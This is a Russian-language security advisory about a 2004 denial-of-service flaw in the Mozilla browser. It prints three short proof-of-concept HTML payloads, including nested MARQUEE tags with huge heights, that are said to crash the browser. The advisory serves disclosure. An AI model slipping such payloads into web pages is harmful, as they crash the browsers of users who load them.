Отказ в обслуживании в Mozilla

Дата публикации:	23.10.2004
Дата изменения:	17.10.2006
Всего просмотров:	1675
Опасность:	Средняя
Наличие исправления:
Количество уязвимостей:	1
CVE ID:	Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:	Нет данных
Наличие эксплоита:	Нет данных
Уязвимые продукты:
	Уязвимые версии: Mozilla Описание: Обнаружена уязвимость в браузере Mozilla. Удаленный атакующий может вызвать отказ в обслуживании программы. Уязвимость существует из-за некорректной обработки некоторых тегов. Удаленный атакующий может с помощью злонамеренного HTML кода аварийно завершить работу браузера. Примеры: Пример 1: <HTML><INPUT AAAAAAAAAA> Пример 2: <HTML> < HEAD> < MARQUEE> < TABLE> < MARQUEE HEIGHT=100000000> < MARQUEE HEIGHT=100000000> < MARQUEE HEIGHT=100000000> < MARQUEE HEIGHT=100000000> < MARQUEE HEIGHT=100000000> < MARQUEE HEIGHT=100000000> < MARQUEE HEIGHT=100000000> < MARQUEE HEIGHT=100000000> < MARQUEE HEIGHT=100000000> < MARQUEE HEIGHT=100000000> < MARQUEE HEIGHT=100000000> < TBODY> Attack of the marquees! Пример 3: <HTML> < HEAD> < TABLE> < APPLET> < MAP> < COL SPAN=900000000> URL производителя: www.mozilla.org Решение: Решение на данный момент не существует
Ссылки:	Mozilla HTML Parsing Errors Let Remote Users Deny Service

Отказ в обслуживании в Mozilla

Подпишитесь на email рассылку